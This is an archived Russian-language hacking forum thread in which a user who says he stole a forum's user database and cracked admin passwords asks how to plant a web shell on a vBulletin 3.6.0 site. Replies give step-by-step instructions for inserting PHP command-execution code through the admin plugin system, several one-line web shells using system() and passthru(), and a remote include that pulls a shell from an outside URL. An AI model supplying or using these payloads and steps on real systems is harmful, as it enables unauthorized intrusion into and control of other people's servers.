Просмотр полной версии : Как залить шелл в vBulletin v3.6.0?
Elenberg
23.08.2006, 14:32
Вобщем, есть форум где стоит булка версии 3.6.0.
Админ ище настраивает и пока не почитстил install.
Т.е. пример: http://target.ru/forum/install/upgrade_301.php?step=бла бла бла
Скомуниздил БД юзров, подобрал пасы. :D
Имею доступ к админке но залить шелл ни как не выходит. :(
Приведеные способы на форуме не работают :(
Кто знает как подскажите плизз с меня репа. :p
Talisman
23.08.2006, 15:45
поиск юзай ) в шаблоны можно пшп код вставлять ;)
если что - стучи, 236662256
Попробуй так
Способ заливки шелла в vBulletin 3.5.*.
1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: Vbulletin: Справка - faq_complete
Вставляем в тело код нашего шелла (шелл не должен превышать 60кб), проще сделать system($_GET["cmd"]);
4. Сохраняем, идём в faq (справка), всё теперь у нас есть шелл. Если он был такой system($_GET["cmd"]); делаем так www.xz.сom/forumpath/faq.php?cmd=тут команда
Elenberg
23.08.2006, 21:32
Люди вы издеваетесь :(
Я ведь написал что все приведеные способы на форуме не работают нужно что то новинькое а гугле пабликов на v3.6.0 нету ничего :(
Мож кто знает что то новенькое? ;)
Talisman
23.08.2006, 21:48
Люди вы издеваетесь :(
Я ведь написал что все приведеные способы на форуме не работают нужно что то новинькое а гугле пабликов на v3.6.0 нету ничего :(
Мож кто знает что то новенькое? ;)
щас свой форум обновлю... попробую шелл залить
через модули 99% наверняка можно залить ИМХО
Elenberg
23.08.2006, 23:21
Может и можна но миниатюрный там ограничение на размер стоит.
При впаривании туда r57shell выдается эго верхняя панель только, та где инфа по серверу. :p
Тут ужно что то другое искать. :confused:
max_pain89
23.08.2006, 23:46
а ты не знал что кроме рст есть например <?system($c);?> и усе, ну разве что подделать немного <?system($_GET['c']);?>, а если вообще красиво
<?
if (!empty($_GET['cmd'])) {
echo '<pre>';
system($_GET['cmd']);
echo '</pre>';
exit;
}
?>
или если есть корявая настройка в php - allow_url_fopen=On, то <? include('http://путь_к_шеллу_рст_без_счетчи ов_нах.txt') ?>
Elenberg
24.08.2006, 01:34
Спасибо max_pain что откликнулся, но даже таким макаром ничего незалить на серв уже пробывал. :(
Нада не через модули наверно или через другие :confused:
Сижу все подряд проверяю :o
Elenberg
почему нече нельзя залить?
через модули вписываеш <? passthru($cmd) ?>
получаеш доступ в CMD смотриш папки с правами и потом уже заливаеш r57.
У меня та же проблема с шеллом. :mad:
Заливаю в vB 3.5.4 через модули <?system($_GET['c']);?>
но при обращении к www.xz.сom/forumpath/faq.php?cmd=dir
вместо листинга открывается страница с ФАК-ом.
Кто что посоветует?
www.xz.сom/forumpath/faq.php?c=dir
Я именно так и делал - не получается.
а с чего ты взял что там форточки?
domaintools.com/ мне подсказал. ;)
Если в личку обращусь - ты не против?
Оо хмм де ты на этом сайте увидел какая ОС стоит на определёном сервере?
может ты увидел эту картинку и не прочитал что на ней написано? =)
http://img.domaintools.com/downloadtools16.gif
Угрюмый, вот тема может помочь damagelab.org/index.php?showtopic=15286
P.S. Как тут файлы прикреплять ?
То Doom123
Server Type: Microsoft-IIS/6.0
IP Address: 2*.***.**.**5
IP Location - Kansas - Wichita - Road Runner Holdco Llc
Response Code: 200
Blacklist Status: Clear
Domain Status: Registered And Active Website
Отсюда я сделал вывод об ОСи на сервере. Я ошибся?
То dT3. Спасибо за участие и ссылку. Если имелась в виду ПассвордПро, то я ее уже юзаю. А вообще интересный сайтец. Надо будет побродить... :)
То Rejjin
Ты хоть слово видел о ВЗЛОМЕ Ачата??? Я с простым сервером не могу справиться, а ты мне приписываешь ТАКИЕ грандиозные планы...
Хотя... Вот когда поднаучусь! ;) Как говорится, плох тот солдат, который не мечтает...
Причем здесь ПассвордПро ?
Я дал ссылку на
Скрипт автовставки шелла в vBulletin через plugins
~!DoK_tOR!~
12.08.2008, 01:15
Шелл через админку VBulletin (http://video.antichat.ru/file221.html)
Кто нибудь скажите, есть шелл что приведен в теме, как залить "нормальный"
чтобы можно было не команды выполнять, а в интерфейсе работать!!!!
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot